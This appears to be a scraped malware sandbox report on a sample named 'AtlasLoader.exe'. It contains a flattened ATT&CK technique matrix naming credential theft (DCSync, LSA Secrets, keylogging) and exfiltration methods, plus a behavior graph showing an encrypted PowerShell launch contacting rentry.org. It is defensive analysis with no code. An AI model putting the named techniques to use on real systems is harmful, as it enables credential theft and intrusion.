Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
Non-Application Layer Protocol		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
Deobfuscate/Decode Files or Information		NTDS1
Application Window Discovery		Distributed Component Object ModelInput CaptureScheduled Transfer4
Application Layer Protocol		SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
Remote System Discovery		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials1
File and Directory Discovery		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync11
System Information Discovery		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 870964 Sample: AtlasLoader.exe Startdate: 20/05/2023 Architecture: WINDOWS Score: 52 17 Multi AV Scanner detection for submitted file 2->17 7 AtlasLoader.exe 1 2->7         started        process3 signatures4 19 Encrypted powershell cmdline option found 7->19 10 powershell.exe 15 22 7->10         started        process5 dnsIp6 15 rentry.org 198.251.88.130, 443, 49699 PONYNETUS United States 10->15 13 conhost.exe 10->13         started        process7

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.